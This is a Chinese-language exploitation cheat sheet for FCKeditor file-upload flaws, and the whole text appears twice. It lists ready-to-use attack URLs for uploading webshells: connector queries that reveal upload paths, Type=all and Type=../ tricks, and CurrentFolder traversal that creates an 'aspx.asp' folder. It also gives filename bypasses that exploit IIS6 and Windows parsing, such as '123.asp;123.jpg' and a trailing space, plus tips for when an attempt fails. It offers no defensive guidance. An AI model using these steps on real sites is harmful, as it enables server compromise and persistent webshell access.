FCKeditor編輯器頁/查看編輯器版本/查看文件上傳路徑
FCKeditor編輯器頁
FCKeditor/_samples/default.html
查看編輯器版本
FCKeditor/_whatsnew.html
查看文件上傳路徑
fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
XML頁面中第二行“url=/xxx”的部分就是默認基準上傳路徑
Note:[Hell1]截至2010年02月15日最新版本爲FCKeditorv2.6.6
[Hell2]記得修改其中兩處asp爲FCKeditor實際使用的腳本語言
FCKeditor被動限制策略所導致的過濾不嚴問題
影響版本:FCKeditorx.x<=FCKeditorv2.4.3
脆弱描述:
FCKeditorv2.4.3中File類別默認拒絕上傳類型:html|htm|php|php2|php3|php4|php5|phtml|pwml|inc|asp|aspx|ascx|jsp|cfm|cfc|
pl|bat|exe|com|dll|vbs|js|reg|cgi|htaccess|asis|sh|shtml|shtm|phtm
Fckeditor2.0<=2.2允許上傳asa、cer、php2、php4、inc、pwml、pht後綴的文件
上傳後它保存的文件直接用的$sFilePath=$sServerDir.$sFileName,而沒有使用$sExtension爲後綴
直接導致在win下在上傳文件後面加個.來突破[未測試]
而在apache下,因爲"Apache文件名解析缺陷漏洞"也可以利用之,詳見"附錄A"
另建議其他上傳漏洞中定義TYPE變量時使用File類別來上傳文件,根據FCKeditor的代碼,其限制最爲狹隘。
***利用:
允許其他任何後綴上傳
Note:[Hell1]原作:http://superhei.blogbus.com/logs/2006/02/1916091.html
利用2003路徑解析漏洞上傳網馬
影響版本:附錄B
脆弱描述:
利用2003系統路徑解析漏洞的原理,創建類似“bin.asp”如此一般的目錄,再在此目錄中上傳文件即可被腳本解釋器以相應腳本權限執行。
***利用:
fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.asp
FCKeditorPHP上傳任意文件漏洞
影響版本:FCKeditor2.2<=FCKeditor2.4.2
脆弱描述:
FCKeditor在處理文件上傳時存在輸入驗證錯誤,遠程***可以利用此漏洞上傳任意文件。
在通過editor/filemanager/upload/php/upload.php上傳文件時***者可以通過爲Type參數定義無效的值導致上傳任意腳本。
成功***要求config.php配置文件中啓用文件上傳,而默認是禁用的。***利用:(請修改action字段爲指定網址):
FCKeditor《=2.4.2forphp.html
Note:如想嘗試v2.2版漏洞,則修改Type=任意值即可,但注意,如果換回使用Media則必須大寫首字母M,否則LINUX下,FCKeditor會對文件目錄進行文件名校驗,不會上傳成功的。
TYPE自定義變量任意上傳文件漏洞
影響版本:較早版本
脆弱描述:
通過自定義Type變量的參數,可以創建或上傳文件到指定的目錄中去,且沒有上傳文件格式的限制。
***利用:/FCKeditor/editor/filemanager/browser/default/browser.html?Type=all&Connector=connectors/asp/connector.asp
打開這個地址就可以上傳任何類型的文件了,Shell上傳到的默認位置是:
http://www.heimian.com/UserFiles/all/1.asp
"Type=all"這個變量是自定義的,在這裏創建了all這個目錄,而且新的目錄沒有上傳文件格式的限制.
比如輸入:
/FCKeditor/editor/filemanager/browser/default/browser.html?Type=../&Connector=connectors/asp/connector.asp
網馬就可以傳到網站的根目錄下.
Note:如找不到默認上傳文件夾可檢查此文件:fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
FCKeditor新聞組件遍歷目錄漏洞
影響版本:aspx版FCKeditor,其餘版本未測試
脆弱描述:如何獲得webshell請參考上文“TYPE自定義變量任意上傳文件漏洞”
***利用:
修改CurrentFolder參數使用../../來進入不同的目錄
/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../..%2F&NewFolderName=aspx.asp
根據返回的XML信息可以查看網站所有的目錄。
/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=%2F
FCKeditor中webshell的其他上傳方式
影響版本:非優化/精簡版本的FCKeditor
脆弱描述:
如果存在以下文件,打開後即可上傳文件。
***利用:
fckeditor/editor/filemanager/upload/test.html
fckeditor/editor/filemanager/browser/default/connectors/test.html
FCKeditor文件上傳“.”變“_”下劃線的繞過方法
影響版本:FCKeditor=>2.4.x
脆弱描述:
我們上傳的文件例如:shell.php.rar或shell.php;.jpg會變爲shell_php;.jpg這是新版FCK的變化。
***利用:
提交1.php+空格就可以繞過去所有的,
※不過空格只支持win系統*nix是不支持的[1.php和1.php+空格是2個不同的文件]
Note:upload/2010/3/201003102334372778.jpg這樣的格式做了過濾。也就是IIS6解析漏洞。
上傳第一次。被過濾爲123_asp;123.jpg從而無法運行。
但是第2次上傳同名文件123.asp;123.jpg後。由於”123_asp;123.jpg”已經存在。
文件名被命名爲123.asp;123(1).jpg……123.asp;123(2).jpg這樣的編號方式。
所以。IIS6的漏洞繼續執行了。
如果通過上面的步驟進行測試沒有成功,可能有以下幾方面的原因:
1.FCKeditor沒有開啓文件上傳功能,這項功能在安裝FCKeditor時默認是關閉的。如果想上傳文件,FCKeditor會給出錯誤提示。
2.網站採用了精簡版的FCKeditor,精簡版的FCKeditor很多功能丟失,包括文件上傳功能。
3.FCKeditor的這個漏洞已經被修復。
--------------------------------------------------------------------------------
FCKeditor編輯器頁
FCKeditor/_samples/default.html
查看編輯器版本
FCKeditor/_whatsnew.html
查看文件上傳路徑
fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
XML頁面中第二行“url=/xxx”的部分就是默認基準上傳路徑
Note:[Hell1]截至2010年02月15日最新版本爲FCKeditorv2.6.6
[Hell2]記得修改其中兩處asp爲FCKeditor實際使用的腳本語言
FCKeditor被動限制策略所導致的過濾不嚴問題
影響版本:FCKeditorx.x<=FCKeditorv2.4.3
脆弱描述:
FCKeditorv2.4.3中File類別默認拒絕上傳類型:html|htm|php|php2|php3|php4|php5|phtml|pwml|inc|asp|aspx|ascx|jsp|cfm|cfc|
pl|bat|exe|com|dll|vbs|js|reg|cgi|htaccess|asis|sh|shtml|shtm|phtm
Fckeditor2.0<=2.2允許上傳asa、cer、php2、php4、inc、pwml、pht後綴的文件
上傳後它保存的文件直接用的$sFilePath=$sServerDir.$sFileName,而沒有使用$sExtension爲後綴
直接導致在win下在上傳文件後面加個.來突破[未測試]
而在apache下,因爲"Apache文件名解析缺陷漏洞"也可以利用之,詳見"附錄A"
另建議其他上傳漏洞中定義TYPE變量時使用File類別來上傳文件,根據FCKeditor的代碼,其限制最爲狹隘。
***利用:
允許其他任何後綴上傳
Note:[Hell1]原作:http://superhei.blogbus.com/logs/2006/02/1916091.html
利用2003路徑解析漏洞上傳網馬
影響版本:附錄B
脆弱描述:
利用2003系統路徑解析漏洞的原理,創建類似“bin.asp”如此一般的目錄,再在此目錄中上傳文件即可被腳本解釋器以相應腳本權限執行。
***利用:
fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.asp
FCKeditorPHP上傳任意文件漏洞
影響版本:FCKeditor2.2<=FCKeditor2.4.2
脆弱描述:
FCKeditor在處理文件上傳時存在輸入驗證錯誤,遠程***可以利用此漏洞上傳任意文件。
在通過editor/filemanager/upload/php/upload.php上傳文件時***者可以通過爲Type參數定義無效的值導致上傳任意腳本。
成功***要求config.php配置文件中啓用文件上傳,而默認是禁用的。***利用:(請修改action字段爲指定網址):
FCKeditor《=2.4.2forphp.html
Note:如想嘗試v2.2版漏洞,則修改Type=任意值即可,但注意,如果換回使用Media則必須大寫首字母M,否則LINUX下,FCKeditor會對文件目錄進行文件名校驗,不會上傳成功的。
TYPE自定義變量任意上傳文件漏洞
影響版本:較早版本
脆弱描述:
通過自定義Type變量的參數,可以創建或上傳文件到指定的目錄中去,且沒有上傳文件格式的限制。
***利用:/FCKeditor/editor/filemanager/browser/default/browser.html?Type=all&Connector=connectors/asp/connector.asp
打開這個地址就可以上傳任何類型的文件了,Shell上傳到的默認位置是:
http://www.heimian.com/UserFiles/all/1.asp
"Type=all"這個變量是自定義的,在這裏創建了all這個目錄,而且新的目錄沒有上傳文件格式的限制.
比如輸入:
/FCKeditor/editor/filemanager/browser/default/browser.html?Type=../&Connector=connectors/asp/connector.asp
網馬就可以傳到網站的根目錄下.
Note:如找不到默認上傳文件夾可檢查此文件:fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
FCKeditor新聞組件遍歷目錄漏洞
影響版本:aspx版FCKeditor,其餘版本未測試
脆弱描述:如何獲得webshell請參考上文“TYPE自定義變量任意上傳文件漏洞”
***利用:
修改CurrentFolder參數使用../../來進入不同的目錄
/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../..%2F&NewFolderName=aspx.asp
根據返回的XML信息可以查看網站所有的目錄。
/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=%2F
FCKeditor中webshell的其他上傳方式
影響版本:非優化/精簡版本的FCKeditor
脆弱描述:
如果存在以下文件,打開後即可上傳文件。
***利用:
fckeditor/editor/filemanager/upload/test.html
fckeditor/editor/filemanager/browser/default/connectors/test.html
FCKeditor文件上傳“.”變“_”下劃線的繞過方法
影響版本:FCKeditor=>2.4.x
脆弱描述:
我們上傳的文件例如:shell.php.rar或shell.php;.jpg會變爲shell_php;.jpg這是新版FCK的變化。
***利用:
提交1.php+空格就可以繞過去所有的,
※不過空格只支持win系統*nix是不支持的[1.php和1.php+空格是2個不同的文件]
Note:upload/2010/3/201003102334372778.jpg這樣的格式做了過濾。也就是IIS6解析漏洞。
上傳第一次。被過濾爲123_asp;123.jpg從而無法運行。
但是第2次上傳同名文件123.asp;123.jpg後。由於”123_asp;123.jpg”已經存在。
文件名被命名爲123.asp;123(1).jpg……123.asp;123(2).jpg這樣的編號方式。
所以。IIS6的漏洞繼續執行了。
如果通過上面的步驟進行測試沒有成功,可能有以下幾方面的原因:
1.FCKeditor沒有開啓文件上傳功能,這項功能在安裝FCKeditor時默認是關閉的。如果想上傳文件,FCKeditor會給出錯誤提示。
2.網站採用了精簡版的FCKeditor,精簡版的FCKeditor很多功能丟失,包括文件上傳功能。
3.FCKeditor的這個漏洞已經被修復。
--------------------------------------------------------------------------------